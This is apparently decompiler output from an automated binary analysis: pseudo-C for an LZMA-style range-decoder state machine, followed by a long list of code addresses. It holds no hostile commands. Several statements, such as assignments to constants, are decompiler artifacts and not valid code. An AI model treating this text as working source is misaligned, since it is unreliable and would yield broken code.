								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M00406A77))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8)); // executed
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                            0x00000000
                                            0x004061d4
                                            0x004061d4
                                            0x004061d9
                                            0x00406250
                                            0x00406257
                                            0x00406261
                                            0x00406840
                                            0x00406840
                                            0x00406843
                                            0x00406843
                                            0x00406849
                                            0x0040684f
                                            0x00406855
                                            0x0040686f
                                            0x00406872
                                            0x00406878
                                            0x00406883
                                            0x00406885
                                            0x00406857
                                            0x00406857
                                            0x00406866
                                            0x0040686a
                                            0x0040686a
                                            0x0040688f
                                            0x004068b6
                                            0x004068b6
                                            0x004068bc
                                            0x004068bc
                                            0x00000000
                                            0x00406891
                                            0x00406891
                                            0x00406895
                                            0x00406a44
                                            0x00000000
                                            0x00406a44
                                            0x004068a1
                                            0x004068a8
                                            0x004068b0
                                            0x004068b3
                                            0x00000000
                                            0x004068b3
                                            0x004061db
                                            0x004061db
                                            0x004061df
                                            0x004061e7
                                            0x004061ea
                                            0x004061ec
                                            0x004061ef
                                            0x004061f1
                                            0x004061f6
                                            0x004061f9
                                            0x00406200
                                            0x00406207
                                            0x0040620a
                                            0x00406215
                                            0x0040621d
                                            0x0040621d
                                            0x00406217
                                            0x00406217
                                            0x00406217
                                            0x0040620c
                                            0x0040620c
                                            0x0040620c
                                            0x00406224
                                            0x00406242
                                            0x00406244
                                            0x00406417
                                            0x00406417
                                            0x0040641a
                                            0x0040641d
                                            0x00406420
                                            0x00406423
                                            0x00406426
                                            0x00406429
                                            0x0040642c
                                            0x0040642f
                                            0x00406435
                                            0x0040644d
                                            0x00406450
                                            0x00406453
                                            0x00406456
                                            0x00406456
                                            0x00406459
                                            0x0040645f
                                            0x00406437
                                            0x00406437
                                            0x0040643f
                                            0x00406444
                                            0x00406446
                                            0x00406448
                                            0x00406448
                                            0x00406469
                                            0x0040646c
                                            0x0040640f
                                            0x00406415
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0040646e
                                            0x004063ea
                                            0x004063ee
                                            0x004069f6
                                            0x00000000
                                            0x004069f6
                                            0x004063f4
                                            0x004063f7
                                            0x004063fa
                                            0x004063fe
                                            0x00406401
                                            0x00406407
                                            0x00406409
                                            0x00406409
                                            0x0040640c
                                            0x00000000
                                            0x0040640c
                                            0x00406226
                                            0x00406226
                                            0x00406229
                                            0x0040622f
                                            0x00406231
                                            0x00406231
                                            0x00406234
                                            0x00406237
                                            0x00406239
                                            0x0040623a
